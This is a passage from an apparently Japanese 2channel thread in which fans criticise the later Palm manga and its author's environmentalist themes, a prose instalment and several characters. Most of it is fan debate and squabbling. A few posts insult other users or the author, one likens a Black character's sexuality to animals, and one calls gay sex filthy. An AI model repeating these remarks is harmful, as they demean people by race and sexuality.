私生活をネットに垂れ流す作家自身の責任でもあるが

最近のこのスレは
芸能人の醜聞と近所の悪い噂にしか興味のない頭の悪いDQN主婦の
井戸端会議みたいでキモチワルイ

275 :花と名無しさん:2006/11/20(月) 14:37:22 ID:???O
作品に私生活を投影してるのは作者自身なわけだが。

276 :花と名無しさん:2006/11/20(月) 14:42:17 ID:???0
>>すっかり駄目になった作家
ってきめつけてるあたり、なにげにヒドス。
そんなに駄目と思うなら離れればいいのになぁ。
しょせん受け手は作り手を期待に沿うように変えたりはできないんだからさ。

277 :花と名無しさん:2006/11/20(月) 17:12:31 ID:???0
>>274
つ【鏡】

278 :花と名無しさん:2006/11/20(月) 17:15:19 ID:???0
私は今のところダメっぽいなと思ってるんだけど、
正直まだ期待は残ってる。

作家が表に出してる事にとやかく言うのはある程度仕方ないとしても、
そこから妄想して悪い部分ばかり広げて、
それをすべてみたいに語る叩き方はおかしいと思うな。

279 :花と名無しさん:2006/11/20(月) 18:32:20 ID:???0
妄想全開で暴れている気持ちの悪いバカなんて、ほんの1〜2匹だろ? 残りはちゃんとした
意見だと思うが。展開が間延びしているのは事実だし、なんとか無事に終わってほしいものだ。

280 :花と名無しさん:2006/11/20(月) 20:00:24 ID:???0
たぶん煽るしか能のないのは数人で他はロムってると思う。
真面目に批判しても揚げ足取るやつしかいないんだもん。
初期の頃のようには行かないけど、やっぱり他の漫画家さんにはマネ
できない部分があるんで、最後まで読むつもり。
たまちゃん、マトモなファンはちゃんと見てるから頑張ってネ。。。



281 :花と名無しさん:2006/11/20(月) 20:29:08 ID:???0
「獣木野生」だからもう愛称は「たまちゃん」じゃなくなるのかな
それともそのままでいいのかな

282 :花と名無しさん:2006/11/20(月) 22:00:03 ID:???0
けもぴんとか言う名称になってたような。
今の名前マジでどうにかならんものか。


283 :花と名無しさん:2006/11/20(月) 22:08:53 ID:???0
けもぴん・・・orz

284 :花と名無しさん:2006/11/20(月) 22:58:00 ID:???0
キモピン

285 :花と名無しさん:2006/11/20(月) 23:18:13 ID:???0
>>280の言葉が大変気持悪い件について
【たまちゃん】だって
【頑張ってネ】だって



オエ

286 :花と名無しさん:2006/11/20(月) 23:27:33 ID:???0
お、今度は矛先が変わったな。

287 :花と名無しさん:2006/11/21(火) 00:29:29 ID:???0
小説の回が、WINGSにどんな体裁で載るのか楽しみ。
横書きでページを巻末から繰って行くスタイル…だとコミックス収録時ヘンか。
でも縦書きのパーム小説って、何かイメージに合わないな。

288 :花と名無しさん:2006/11/21(火) 00:56:25 ID:???0
つ【ファンブック】

289 :花と名無しさん:2006/11/21(火) 04:18:55 ID:???0
>>280
自分はマトモなつもりなんですねw

290 :花と名無しさん:2006/11/21(火) 07:37:51 ID:???0
どうやら粘着荒らしは1匹みたいだな。

291 :花と名無しさん:2006/11/21(火) 15:32:44 ID:???0
>>290がどの人を指して一匹の嵐と数えているのかがちょっと気になる
たまちゃんコールの人だろうか、ダタイの人だろうか……

292 :花と名無しさん:2006/11/21(火) 15:54:03 ID:???0
そんな些細なことは気にするな
人生は短い

293 :花と名無しさん:2006/11/21(火) 16:31:11 ID:???0
>>291
一匹の嵐と数えているのかがちょっと気になるってる人

294 :花と名無しさん:2006/11/21(火) 17:21:21 ID:???0
>>293
あなたがどの人かは詮索しないけど、人のレスに無意味な皮肉で返すのは
充分嵐だと思うよ……(´・ω・`)ガカーリ

295 :花と名無しさん:2006/11/21(火) 17:44:09 ID:???0
どっちもくだらない煽り合いやめなって。

296 :花と名無しさん:2006/11/22(水) 00:31:44 ID:???0
JB「煽りに煽りで対抗すれば泥仕合だ」

297 :花と名無しさん:2006/11/22(水) 00:42:12 ID:???0
ツマンネ

298 :花と名無しさん:2006/11/22(水) 08:10:38 ID:???0
私も嵐は1人なんかじゃないと思う。
昔、伸たまきの作品は好きだった。

サロニーがジェイムズに乗り移ったオカルト話あたりから、
オウム真理教と全く同質の感性をバリバリ発散するもんで
(作者本人はコレを激しく否定するだろう)
イヤになっただけ。地球救済カルト信仰はやめなよ・・・

でも狂信者は、それに永久に気づかないね。

299 :花と名無しさん:2006/11/22(水) 09:26:11 ID:???O
神秘志向は初期からあったから別に構わないが、程度の問題なんだよな。ライオンの
前では銃はすべて不発なんて、そんな不思議パワーがあればオワキングに手を出す
企業の首脳陣をみんなヌッコロせば良いよね。神秘と現実のバランスが悪すぎる。

300 :花と名無しさん:2006/11/22(水) 11:55:35 ID:???0
ドウーイ
神秘ネタ自体はいいよ、むしろ歓迎。
ただ、ところどころ無意味に都合が良すぎなんだよなぁ。

301 :花と名無しさん:2006/11/22(水) 11:59:59 ID:???0
>都合
まあ「午前の光」なんて全編そうだったからねえ。
最後の探偵編っつーか、単にジェームス婚約&セレブ化完成編だし。
これなら、「愛でなく」にエピソード丸ごとつっこんだ方がよかった気もする。

302 :花と名無しさん:2006/11/22(水) 13:14:31 ID:???O
ちょっと聞きたいんだが、作者はシリーズ開始当時から今みたいな緑豆的な人だったの?
そうでないなら、作者の過度の環境保護思想が作品を歪めつつあるような気がして
ならないんだが。このままだと仮面作者みたいになりそうで心配。

303 :花と名無しさん:2006/11/23(木) 13:30:22 ID:???0
環境云々言い始めたのは、ASPと愛でなくの間に描いた
近況漫画が最初だったような。(欄外コメントは知らん)
昔もある意味浮世離れした人だったけど、今みたいに
何かの宗教みたいに環境環境と作中で連呼したり、
JB可愛さに脚本も演出も作画もJB以外どうでもいいみたいな
ぞんざいで生気のない描き方する人じゃなかったよ。

むしろ、そこらの漫画家よりずっとドライに
作品やキャラクターに接してるような印象を受けた。
シナリオを完成させてから漫画を描くスタイルのせいもあるのかな、と
思ったもんだったけど。

こういう風に劣化する作家は他にもいるけど、そこから立ち直った作家は
知らないんだよねえ…('A`)

304 :花と名無しさん:2006/11/23(木) 15:55:01 ID:???O
>>303
禿しくドゥイ。
最初は環境保護の姿勢は作中に無かったよね。
近況のたまぴんマンガで環境云々を出しはじめたのは
欧米で環境問題の活動が盛んになってからだと思うな。
当時の日本は「環境保護?なにそれ。手作り石鹸で食器も体も頭も洗うの?ェェエエ工(ry」
という状況だったもの。

305 :花と名無しさん:2006/11/23(木) 18:01:45 ID:???0
作中でJBが口にしている環境問題に関する主張は、そのまま緑豆のそれなのかな。
自分はああいう狂信集団に興味がないから良くわからないけど、ひとつだけ言えるのは
本当にJBの言う方法で上手くやっていくためには、ああやってJBがオカルト的超人に
なるしかない……つまり事実上不可能ってことだよねw

306 :花と名無しさん:2006/11/23(木) 21:05:17 ID:???0
というか、「愛でなく」の時は(ストーリー自体がアレだったのは置いておいて)
何というか、個々人がどう環境問題に向き合うかはその人次第、ってとこなかった?
例えばタバコは吸うけど洗剤だけでも変えてみよう、とか、そういう風に
その人なりに手の届く範囲で、ちょっとずつ興味を持って、
出来ることをやってみるだけでもいいんだよ、みたいな。

それが環境ネタが引っ込んだはずの「午前の光」では、
「JBが所有する企業が環境問題への配慮を機軸として経営改善→株価上昇」
とか、何というか、JBや環境という”作者の大事な物”が何より大事な世界、に
なっちゃってる閉塞感があったなあ。
それが、宗教的な押しつけがましさ(事ある毎に「全て○○神様のおかげです」と
唱えられてるような鬱陶しさ)になってた気がする。

ASP以前のパームの魅力って、世間的には鼻つまみ者なキャラクターも含めて
みんなが穏やか(?)にすごせるオーガス家に代表される「良きアメリカ=多様な在り方」
のイメージにもあったと思うんだけど、もうその余裕を感じないんだよね…

307 :花と名無しさん:2006/11/23(木) 21:11:49 ID:???0
「ガラスの仮面」と違って、連載期間には限りがあるからねぇ。このまま環境ゴロのPRマンガ
みたいな状態で終わるのは嫌だなあ。

“JBを中心に、良くも悪くも世界中が影響を受けて変わりはじめる”というのをやりたいんだと
思うけどさ、それって最初からやりたかったことなのかな? 俺はもっと、登場人物全体の
群像ドラマだと思っていたんだけどな。

308 :花と名無しさん:2006/11/23(木) 22:50:20 ID:???0
JBが希求するおだやかな日常も、高潔なエコロジーの志も、これから厳しい現実の
前に敗れ去っていくのでしょう。
なぜなら、ジェームスやカーターの20年先を生きている我々は、世界がそのような
方向に進んでいないことを知っているわけだから。

レオ・ネロだって、「あの男が踏み込んだのは破滅の道だ」と予言してるし。

309 :花と名無しさん:2006/11/23(木) 22:57:49 ID:???0
>>308
でも最後のカーターの子供あたりでは今の時代追い越してるんだったと思うから、
そこらへんで花咲いたりするんじゃないだろうか。

310 :花と名無しさん:2006/11/23(木) 23:02:18 ID:???0
いや、エコロジーの思想はそれなりに受け入れられてると思う。

311 :花と名無しさん:2006/11/23(木) 23:35:18 ID:???0
>310
80年代に比べたら「いささかマシ」程度かも知れないけどね。
あの頃のアメリカでエコやってるってのは、やはり当時としちゃ
相当奇特な人設定なんだろうな。

そういえば80年代設定なのに、誰も当時のヘアスタイル(頭のてっぺんの毛を
短く切ったアレ)してるキャラがいないや。
いても笑うがw

312 :花と名無しさん:2006/11/25(土) 14:37:44 ID:???0
>>308
同意。
誰がどんな宗教やろうと、我々人間の増殖自体が
地球にとっては破滅。

人類は地球という生き物に発生した癌細胞以外の何者でもないからね。
親が癌で死んで確信したわい。

313 :花と名無しさん:2006/11/25(土) 16:03:09 ID:???0
クマー

314 :花と名無しさん:2006/11/26(日) 17:41:27 ID:???0
今月末に発表される小説版、やっぱり楽しみです。
未来の話はどこまでバラしてくるんでしょうかね?
字でばらすのもどうかと思いますけどね。まんがとして!

環境の話については、「愛でなく」の中のその手の記述を
かなりすっとばして読んでいるので何とも言えない。
みなさん、全部読んだのですか?
私はだるくて全部は読めなかった。
正直、別の場所で問題提起してください、と思いました。

315 :花と名無しさん:2006/11/27(月) 05:32:29 ID:???0
>>314
一応読んだけど、受け売りの文章ばっかで
非常にくだらない。くだらないっていうのは、漫画というものを
長文の羅列で構成するというところが。

魔夜峰夫も好きなんだけど、あの人も思いっきり文章だけで話を進める癖があって
それが出ると読む気無くすんだよね。

316 :花と名無しさん:2006/11/27(月) 09:02:22 ID:???O
たがみよしひさとかは、ダメなタイプか・・・

時代設定を考えたら、受け売りとは言いきれないかもしれん
現在の視点から見たら、どうかとしても

317 :花と名無しさん:2006/11/27(月) 14:22:00 ID:???0
たがみよしひさ氏と、エコ猿期の獣木氏と同列で語られただけで
ちょっとムッとしたw 


格 が 違 う よ   ふ  ざ  け  る  な   

318 :花と名無しさん:2006/11/27(月) 14:50:19 ID:???0
>>317
こういうのもウザイなぁ。
「ここはグリーンウッドもクロマティ高校も男子校だよね」程度のくくりで、
誰も同列だなんて言ってないのに勝手に怒ってんの。

319 :花と名無しさん:2006/11/27(月) 14:58:32 ID:???O
まあ思い込みの激しい人が、結構いるスレだわな
それが悪いかどうかを論じるべきかは、疑問かもしれないが

320 :花と名無しさん:2006/11/27(月) 16:58:41 ID:???0
他漫画や他作家を不用意に比べて出すのは荒れる元
そんなの常識以前だろ

321 :花と名無しさん:2006/11/27(月) 17:31:37 ID:???0
荒らしてんのは317だけどね。
だれもどっちがいいとか言ってないのに。
あと常識は「荒らさない」方が重要でしょ。

322 :花と名無しさん:2006/11/27(月) 18:23:47 ID:???0
ていうかなんで>>316がいきなりたがみよしひさとか言い出したのかも
たがみの名で何が言いたいのかもさっぱりわからん私が馬鹿なのか。

323 :花と名無しさん:2006/11/27(月) 18:30:48 ID:???0
>>322
流れから行くと文章で話を進める部分が多いって事だと思う。
ていうかもういいよ。
名前が出ただけでこんなになるたがみって儲怖いわ。


324 :花と名無しさん:2006/11/27(月) 21:42:57 ID:???0
>>323
もしかして最初から意図的にやってるの?
言葉通り荒らされたくないとか思ってるその同じレスで
>たがみって儲怖いわ。
とか捨て台詞吐くし。なにこの人……

325 :花と名無しさん:2006/11/27(月) 21:44:28 ID:???0
消し忘れた
×>言葉通り荒らされたくないとか思ってるその同じレスで
○>荒らされたくないとか言ってるその同じレスで
意味分かんない文書いてもうた…

326 :花と名無しさん:2006/11/27(月) 21:49:02 ID:???0
もうやめようよ。
そんなことよりアンジェラがもう出ないのかどうか知りたい。

327 :花と名無しさん:2006/11/27(月) 21:49:20 ID:???0
なんでこのスレで唐突にたがみ叩きしてんの?>>323

328 :花と名無しさん:2006/11/27(月) 22:33:26 ID:???O
>>316=>>323だから

329 :花と名無しさん:2006/11/27(月) 23:50:23 ID:???0
別にたがみって人自体は叩かれてないじゃん。
ちょっとしつこくない?

330 :花と名無しさん:2006/11/28(火) 02:08:06 ID:???0
>>326
前スレ見てなかったら、そんな事全く知りようがなかった私。
3巻読んでても、最後の旅行にまったく顔出さなかったのが気になる程度で
本編中で何も語られてないし(今作での退場について)。

海外ドラマとかで、新シーズンになると契約しなかった役者の役が
何の音沙汰も無く消えるってのがあるけど、全部自分で描く漫画で
なんでこんな不自然な扱いするんだろう。それもあんなメインどころで。
渡鬼かよ('A`)

331 :花と名無しさん:2006/11/28(火) 06:43:52 ID:???0
長セリフで話をすすめる漫画家が悪い、という定義に問題あり

332 :花と名無しさん:2006/11/28(火) 08:47:59 ID:???O
大島弓子の立場は。

333 :花と名無しさん:2006/11/28(火) 11:26:18 ID:???0
>>330
前にはリアル母親がモデルになってるから、
そこと関係あるのかもという意見が出てた。
まぁ憶測でしかないんだけど。

>>331-332
>>315の意見なんだからべつにスレ総意じゃない。
私も文章多い漫画好きだし。
しかもノベルで掲載と文章多い漫画は根本的に違うんだから。

334 :花と名無しさん:2006/11/28(火) 12:09:51 ID:???0
作品中の文章比率が単純に多いか少ないかじゃないよ……
必然性があるのか、馴染んでるかどうか。
獣木作品は失敗してるから違和感があるわけで、そこで
たがみ某だのに転嫁するからわけわかんなくなるんだよ。
何が「たがみ儲怖い」だw 

335 :花と名無しさん:2006/11/28(火) 12:11:53 ID:???0
それとある意味根っこは同じだが、よくあるアニメ化とか
ノベライズ化といった他メディア展開でのことなら別だが
作品をマイ小説で説明したがる漫画家は漫画舐めてるとオモ。

336 :花と名無しさん:2006/11/28(火) 12:20:44 ID:???0
舐めてるっつーか、自分の無能をさらけ出してるだけでしょ。
怒るんじゃなくて、指さして嘲笑ってやればいいんだよ。

337 :花と名無しさん:2006/11/28(火) 12:32:42 ID:???O
また乱暴なくくりで、ひとまとめで罵倒しようとするなあ


338 :花と名無しさん:2006/11/28(火) 12:41:19 ID:???0
まだ手に取ってないんで推測だけど、「午前の光」の最終盤でジョイが言ってた
「一族の話を書くの」っつーのが、そのまま「蜘蛛の紋様」になるわけでしょ。

その辺を効果的に見せるために、一発目に小説を持ってきただけなんじゃないの?
あくまで、劇中のジョイによる著述として。

339 :花と名無しさん:2006/11/28(火) 12:56:17 ID:???O
>334
すくなくとも>315は、文章の長短しか評価対象にしてないみたいだが

340 :花と名無しさん:2006/11/28(火) 12:59:34 ID:???0
>>334
ダメなノベライズと文章だけで話を進める漫画をいっしょにしたのが>>315
文章多い漫画自体がダメだと受け取り、たがみもダメかと思ったのが>>316
名前が出てきただけで激怒したのが>>317

ごちゃごちゃになって文章多いから何だという話にもつれこんだわけで、
誰もたがみを貶してるわけじゃないって何度も出てるのに。

341 :花と名無しさん:2006/11/28(火) 13:29:00 ID:???0
まぁ、こんなのと並べて語られる=貶される、と他作家ファンが
思っちゃうような位置にたまぴんが来ちゃったんだなぁ……、と
ほんのりしてみたりして。
ASPまではほんと、胸張ってすごい漫画家なんです大好き!!と
人に推してた。
だから今のアレ具合がちょっと寂しい。

342 :花と名無しさん:2006/11/28(火) 15:08:28 ID:???0
>作品をマイ小説で説明したがる漫画家は漫画舐めてるとオモ。
ある意味同意。
でも舐めてるというより、漫画をそれ程重要視してない印象を受ける。
小説はたぶんファンでも1部の人しか見ないだろうけど
どんどん同人化していってる気がする。



343 :花と名無しさん:2006/11/28(火) 15:17:10 ID:???0
もともと漫画描きたいわけじゃなくて
パーム描きたかった作家だからある意味しょうがない。
(そのパーム自体もガタがきてるけど)

ちゃんと書けて完結するなら小説でもいいんだけど、
パームブック小説の登場人物描写が漫画とかけ離れてたから、
出来ればやめて欲しいものだ。

344 :花と名無しさん:2006/11/28(火) 16:07:46 ID:???0
それはあるね。パームブックの小説は悪いけど素人レベルだったし。
どうしても小説メディアを併用したいなら、その独自スタイルを
押し通せるレベルのもので出してほしい……
監修つけて別作家に書かせるとかいくらでも考えられるけど、
プライドが許さないだろうから無理だなきっと。

345 :花と名無しさん:2006/11/28(火) 17:23:54 ID:???0
そこで西尾維新ですよw

346 :花と名無しさん:2006/11/28(火) 18:46:50 ID:???0
>>345
原作がかすむからやめてやれ

347 :花と名無しさん:2006/11/28(火) 20:24:29 ID:???0
まあ流石に「蜘蛛の紋様」では、エコ主張は前面には出せまい。「WORLD」みたいなファンタジー展開はあるかもしれないが
例えば、不自然な出来事に因果応報が強調されていたり、ブラックワイルドとホワイトワイルドが友情出演していたり・・・

しかし、神様なジェームスとサロニーがいても、地球環境は悪化する一方なのね

348 :花と名無しさん:2006/11/28(火) 22:47:47 ID:???0
パームブックの小説はマンガで読んでてあらすじを知ってたからなんとか読めたけど
はっきりいって面白くなかった。
でもあれはかなり昔の物だし小説のレベルがあがってる事を期待するよ

349 :花と名無しさん:2006/11/28(火) 22:59:19 ID:???0
本筋の漫画でさえあの状態なのに、今の獣木さんに小説の質を上げようと
いう向上心があるかどうか(というか、質が悪いという自覚があるかどうか…)

350 :花と名無しさん:2006/11/28(火) 23:31:05 ID:???0
もともと、脚本がすごく面白い(=漫画で読んでいても、台詞や会話の演出が面白い)人だったから、
ASP以前ならまだ楽しみに出来たと思うんだけど、今やその前提から覆ってるからなあ…
手抜きCG丸出しでも皆同じ顔&骨格でも、脚本の時点でしっかりクオリティを保ってるなら
ここまで失望させられることはなかっただろうし。

その劣化した文章力で「小説書きます」とか言われても、ってのが正直なところだ。

351 :花と名無しさん:2006/11/28(火) 23:41:25 ID:???0
なあ・・・ASPのころから、今の片鱗があったと思うんだけど

352 :花と名無しさん:2006/11/28(火) 23:51:48 ID:???0
もう○のなかにJとかKとか書いてある棒人間でもいいよ。

○ <カーター!


353 :花と名無しさん:2006/11/28(火) 23:53:53 ID:???O
今回の小説、オーガス家のご先祖様がどうこういう長い話より、
「アンジェラは〇〇〇になった。」
という一文が一番印象に残った。驚いたけどなんか妙に納得したなぁ。
しかし建築家志望だったはずの彼女が、何がどうなって〇〇〇になったのか知りたい。

354 :花と名無しさん:2006/11/29(水) 00:04:37 ID:???0
>353
ジェームスの死が少なからず関係した、とか?

いやまったく、究極の適材適所と思うわw

355 :花と名無しさん:2006/11/29(水) 00:49:15 ID:???0
警察官?

356 :花と名無しさん:2006/11/29(水) 01:08:41 ID:???0
カーターはじめ、今回のカーターたちのご先祖様たちまで含めた
諸々すべてのつながりが、ふたつに分かれた豆をひとつに
(ジェームスとアンディを出会わせるために)するためのものだったのだと
言い切っちゃうところには正直ついていけないものを感じた、けど
もともとこういう話だっけパームは。
はっとするような面白いところもあるんだけど、作者の思い入れが読んでて重たい。

>353 アンジェラが無性に恋しい…。

357 :花と名無しさん:2006/11/29(水) 06:43:56 ID:???0
○○○
裁判官
看護士
外科医
消防士
・・・・なんでも入るじゃないか

358 :花と名無しさん:2006/11/29(水) 07:51:26 ID:???0
左官屋
これか!

359 :花と名無しさん:2006/11/29(水) 08:11:22 ID:???0
「アンジェラはお星様になった。」 。・゚・(ノД`)・゚・。




真面目な話、大統領とかだったら笑うな。女性初の。

360 :花と名無しさん:2006/11/29(水) 10:32:03 ID:???0
ああ大統領。いいねぇ。

…文字を並べれば「小説」といえるのか。
せめて絵物語にしてくれれば。
身の回りの出来事を一人称で綴るのも「海馬」なら爆笑なのに。

次回は漫画にもどるそうで、今月号のことは記憶の彼方へ葬り去ってしまおう…

361 :花と名無しさん:2006/11/29(水) 11:02:00 ID:???0

他人の作品を引き合いに出してしまって申し訳ない。
さらっと流して下さい…

362 :花と名無しさん:2006/11/30(木) 07:59:51 ID:???0
○○○って何?
メアド欄でいいからネタバレしてよ。気になる。

363 :花と名無しさん:2006/11/30(木) 09:59:30 ID:???0
あのトークからして弁護士?
つか読んでくればいいのかw

364 :花と名無しさん:2006/12/01(金) 10:23:09 ID:???0
メアド欄
読んでてもどこに書いてあるか中々気付かなかった。
読みにくいし、思わず読み飛ばしそうなところに書いてあるよ

365 :花と名無しさん:2006/12/01(金) 11:27:50 ID:???0
ををありがとう。
ほんとだ、意外と意外性ないねw

366 :花と名無しさん:2006/12/02(土) 03:53:25 ID:???0
なんかパームの人、幸せじゃないキャラ多いのね。いいんだけど。
好きだから読んでるんだし。

たださ、午前の光でのジョイは、登場シーンからして、
オウム真理教の   ””アノ女性そっくりの言い分””   だから
サリン事件のとき地下鉄に乗っていた私は、本当にジョイが気持ち悪い。

さっさとジョイには早死にして欲しかったんだが、
40過ぎまで生きてんのか。ガッカリ。。。

367 :花と名無しさん:2006/12/02(土) 10:39:16 ID:???0
てか、ジェームスに深く関わった人ほど不幸になっていく率が高いよね
途中で離れた人はそこそこ幸せになっているっぽい


368 :花と名無しさん:2006/12/02(土) 11:06:27 ID:???0
だって作者にとっては、ワタシのJBに近づく者=邪魔者だもの。

369 :花と名無しさん:2006/12/02(土) 12:40:26 ID:???0
姑の嫁いじめかw

370 :花と名無しさん:2006/12/02(土) 13:04:17 ID:???O
>>366
kwsk

371 :花と名無しさん:2006/12/02(土) 16:55:35 ID:???0
そういう感想は持つのはともかく、公然とするのはどうかと・・・

372 :花と名無しさん:2006/12/02(土) 17:24:22 ID:???0
アンジェラが○○○になったのは納得できるけど
ティナが○○○○の○○(メル欄)てなに…

373 :花と名無しさん:2006/12/02(土) 17:30:47 ID:???0
小説…暗かった…
なんだろうこれ…
本当にハッピーエンドになるんでしょうか?

あと、ティナとアンディって何歳くらい
年はなれてるのかなぁとか、
ジョゼって本物のざしきわらしだったんだなぁとか、
思いました。


374 :373:2006/12/02(土) 17:36:32 ID:???0
ネタばれになってたらすみません。

>372
最初「ティナって誰だっけ?」って思っちゃいました。
まだ出てきてない人だと思い込んでしまって…。
なんでメル1なんですかね?メル2してないですよね。

375 :花と名無しさん:2006/12/02(土) 19:57:54 ID:???0
少なくとも15、6歳は離れてるでしょ(汗
幼女姦もいいところでは。

376 :花と名無しさん:2006/12/02(土) 20:01:37 ID:???0
ティナだって永遠に幼女じゃないだろ。

377 :花と名無しさん:2006/12/02(土) 20:03:59 ID:???0
パームブックにも生年月日が載ってないんだっけ>ティナ

初めて出会ったとき、アンディは20歳だっけ?

378 :花と名無しさん:2006/12/02(土) 20:04:37 ID:???0
じゃあ一体何年後よ?
10年足したってせいぜい15、6歳でしょティナ。

アンディも変質者化か……もうだめぽ


379 :花と名無しさん:2006/12/02(土) 20:17:52 ID:???0
15はともかく16、17なら問題無い気がする。
即肉体関係とか考えるとおかしいかもだけど、
アンディは別にそういうタイプじゃないし。

380 :花と名無しさん:2006/12/02(土) 20:53:38 ID:???0
いや、むしろ動物的に 身 体 で コミュニケートするタイプだろ。
成人した段階で相手の幼児期を知っていてヤるというのは、十六すぎてても
ロリと呼んでいい状況だよ……キンモー☆


381 :花と名無しさん:2006/12/02(土) 21:01:31 ID:???0
>>380
じゃあ、幼なじみ同士の恋愛には否定的?

382 :花と名無しさん:2006/12/02(土) 21:04:53 ID:???0
>381
年齢差の壁があるんじゃ有るまいか?
私は納得できるエピが有ればいいけど、無さそうだしな〜

383 :花と名無しさん:2006/12/02(土) 21:25:11 ID:???0
まあ愛でなくからこっち、アンディの暴れん棒っぷりは
何度も描写されてるからなあ。なんかもうただの露悪趣味って感じだが。

384 :花と名無しさん:2006/12/02(土) 21:31:59 ID:???0
アンディの死因関係が、ティナに起因するとしたら・・・

385 :花と名無しさん:2006/12/02(土) 21:42:16 ID:???0
ティナって誰だっけ?
…う〜ん、黒人の女の子でOK?

386 :花と名無しさん:2006/12/02(土) 22:02:59 ID:???0
>>384
スタミナを搾り取られて衰弱死か!?

387 :花と名無しさん:2006/12/02(土) 23:09:03 ID:???0
や、10年後だとしてアンディもそんな搾り取られる年じゃないだろ

388 :花と名無しさん:2006/12/03(日) 00:47:20 ID:???O
自分もティナが誰なのか思い出せない。

389 :花と名無しさん:2006/12/03(日) 00:51:58 ID:???0
>>385 >>388
グレッグの死んだ恋人の娘、歯の詰め物で狙われる@「スタンダードデイタイム」

コミクス中でグレッグが「今年6つになる」と言ってるから、歳の差11・2歳だね。
速水真澄のように「11も年下の少女に」とか悩んだりしないんだな。
さすが、パームキャラだw

390 :花と名無しさん:2006/12/03(日) 01:21:30 ID:???0
酷いな……悪くなるにしたってここまで狂うのか

391 :花と名無しさん:2006/12/03(日) 01:26:05 ID:???0
まぁ年の差カポーというだけならまだ許容範囲だが愛人ってのは何?
何で「恋人」とかの表現じゃないんだろう……

392 :花と名無しさん:2006/12/03(日) 03:24:27 ID:???0
家庭や子供を持って創作活動と両立させる芸術家もいるが
アンディはそういうタイプではないと。
アールヌーボーの時代の芸術家とその愛人って
イメージで使ってるのじゃないか?

80年代アメリカで独身同士の20代青年とハイティーンの少女だと
恋人という表現の方が適切だね…

393 :花と名無しさん:2006/12/03(日) 03:36:58 ID:???0
愛人てのは正妻なり恋人なりがいて、「その他に」いる場合でしょ。
わざと嫌悪感そそる表現してるのか、単に頭悪いのか判断に困るな。
それにしたってティナはねーべ。ロリというよりか、精神的にはもはや
ペドの範疇かも。

394 :花と名無しさん:2006/12/03(日) 04:51:27 ID:???0
>>393
しかもその愛人って男なんだよね。
アンディまで両刀だったわけだ。

肛門性交には、きわめつけの不潔感があるからイヤ。糞は嫌い。

395 :花と名無しさん:2006/12/03(日) 08:40:19 ID:???0
アンディに、カーターあたりが眉をひそめそうな、そういう文明人的な倫理観があると思ってるのか?

396 :花と名無しさん:2006/12/03(日) 09:54:29 ID:???0
下半身はアフリカ動物レベルですか

397 :花と名無しさん:2006/12/03(日) 10:47:34 ID:???0
多分カーターとかシドとかビアトリスとかフロイドとかで見たように、
「他人には理解しがたいかもしれないが、いろんな愛や結びつきの形がある」
というようなことを描きたいんだと思う。

前だって「不倫」だけだと嫌だけど、描写があればまた変わってきた。
でもたいした描写も無くいきなり単語だけぽんと投げ出されても、
嫌悪感の方が先に出るわな。


398 :花と名無しさん:2006/12/03(日) 10:58:31 ID:???O
>>389
ありがd。

ジョイって作者の自己投影がだいぶ入ってるんだよね。
オーガス家が芸術家の家系でジョイもその末席にいるというくだりは
典型的な厨二病の「生まれつき特別な才能がある厨ちゃんミャハ」
な感じを作者から感じて禿しくモニョる。

399 :花と名無しさん:2006/12/03(日) 11:18:07 ID:???0
うん。ジョイは作者まんまだね。だから鬱陶しいし痛い……


あーあ、パーム大好きだったのに。パームに向かって鬱陶しいとか
言うレス書くようになるなんてASP以前は思ってもみなかったよ……

400 :花と名無しさん:2006/12/03(日) 11:21:20 ID:???0
同じ作者の投影であっても、ヴォイド・ビダーに対しては、そういう感覚はおこらなかったんかいな

401 :花と名無しさん:2006/12/03(日) 11:22:35 ID:???0
間違い
ビダー・ボイドだった

402 :花と名無しさん:2006/12/03(日) 12:50:18 ID:???0
>>400
ビダーもふしだらで、低年齢出産の典型的DQNだが
自分から毅然として男をフッたところが、鬱陶しがられなかったんだろ。

「私は16で自分が誰か、何者か、何になる知っている」
なんぞとほざき、男にモーレツに結婚を迫る
ドドド妄想女ジョイは、現実世界の男女両性から嫌われて当然。しょうがない。

403 :花と名無しさん:2006/12/03(日) 13:12:09 ID:???0
シドのイタタに比べたらジョイはまだ若いから仕方がないと思っていたけど
今回の小説読んだらアイタタタ・・・・・


404 :花と名無しさん:2006/12/03(日) 13:24:09 ID:???0
私はジョイに作者の自己投影云々は(一応)推測でしかないと思うけど、
それはそれとしてジョイが面白くもなんともないキャラだとも思う。
だってDQN分取り除いたら何も残らないじゃん。

ビダーの時は、まだ男前分もヘタレ分もきちんと盛り込んであったし、
お姉さんみたいにビダーに批判的な感情も持ってる客観的なキャラも
作品中にいたけど、いまやパーム世界のキャラが総JB教信者で
その婚約者様も元つがいもボスもマンセー状態だからねえ。マジ勘弁。

405 :花と名無しさん:2006/12/03(日) 13:59:38 ID:???0
変な例えだけどドラゴンボールの作者は主人公にあまり思い入れが無かったようで、
長く続けるにはキャラと距離をとるのは重要なんだと思った。
でも距離があったらパーム自体生まれてないもんなぁ。

406 :花と名無しさん:2006/12/03(日) 14:06:52 ID:???0
カーターはマンセーと言うよりも、最早自分の手には負えないと諦めつつあるような

407 :花と名無しさん:2006/12/03(日) 15:23:41 ID:???0
ジョイは「午前の光」中、自分の一族とジェームス経由の関係者にしか
関心を持たないキャラ描写なので、読んでても存在感が激薄だった。
いずれ昔のアンディのように、赤の他人との交流に目覚めるエピソードも
あるのかと思ったけど、今回の小説を見る限りあのまんま来たような。
その閉じた目線で「現代人と携帯」とか「結婚」について言及されても
息苦しいばかりで。
視野の狭いキャラってのも別に構わんけどね。魅力的でさえあれば。
ジョイは余りに良いとこなしなので、結婚―出産までにもう少し
人間的なエピソードが欲しいよ。

408 :花と名無しさん:2006/12/03(日) 17:45:27 ID:???0
ビダーは自分の力で必死に食べていこうと努力してたからいいの。

ジョイは芸術家きどりだけど、しょせんジェームズの莫大な遺産で
生きてるじゃん。いい歳こいてアンディの家でカーターと同居だし。

まず経済的に独立しないと読者の共感は得られないね。
「芸術家とは食べるために創作しない云々」言う前に。

409 :花と名無しさん:2006/12/03(日) 18:10:28 ID:???0
経済的独立なんてどうでもいいんだよ。そんなの持って無くたって愛されるキャラはいる。
(個人的には、自分で働いて食ってたらその辺割り切りにくくなるのはわかるが)

これだけエピソードや設定が増える度に不愉快になるだけ(共感を呼ぶネタが一つもない)
キャラもめずらしいわ。

410 :花と名無しさん:2006/12/03(日) 20:17:15 ID:???0
作者と読者の求めているものが、どんどん離れていくような気がするな。

411 :花と名無しさん:2006/12/03(日) 20:30:22 ID:???0
というか読者の方も、自分の中で理想化されたパームを持っちゃってるからなあ

